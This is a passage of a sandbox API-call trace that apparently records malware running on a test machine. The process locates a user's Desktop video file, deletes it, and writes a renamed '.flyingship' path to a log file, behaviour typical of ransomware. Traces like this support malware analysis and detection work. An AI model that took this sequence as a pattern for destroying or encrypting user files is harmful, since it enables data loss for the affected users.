Flags=0x0, Size=0x10) returned 0x9bd330 [0163.727] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0163.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0163.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0163.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0163.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0163.743] FreeLibrary (hLibModule=0x75990000) returned 1 [0163.743] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0163.743] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0163.743] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0163.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0163.743] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", lpFilePart=0x0) returned 0x34 [0163.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x70430e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 0x90ae18 [0163.746] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkicocoalm.flv")) returned 1 [0163.750] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x70430e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 0 [0163.750] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0163.751] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0163.751] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0163.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0163.752] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0163.752] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0163.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0163.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0163.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0163.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0163.752] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0163.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0163.753] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0163.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0163.753] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0163.753] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0163.753] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0163.754] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.755] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0163.755] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.755] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0163.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0163.756] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0163.756] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x88f, lpOverlapped=0x0) returned 1 [0163.756] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0163.756] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x88f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.756] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0163.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0163.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0163.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv\r\n", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0163.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv\r\n", cchWideChar=66, lpMultiByteStr=0x9aa4f8, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv\r\n", lpUsedDefaultChar=0x0) returned 66 [0163.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0163.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0163.757] WriteFile (in: hFile=0x138, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x41, lpOverlapped=0x0) returned 1 [0163.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0163.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0163.757] CloseHandle (hObject=0x138) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0163.759] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0163.759] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0163.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0163.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0163.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0163.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0163.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0163.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0163.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0163.772] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0163.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0163.773] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0163.773] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0163.773] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0163.773] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0163.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0163.774] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.776] 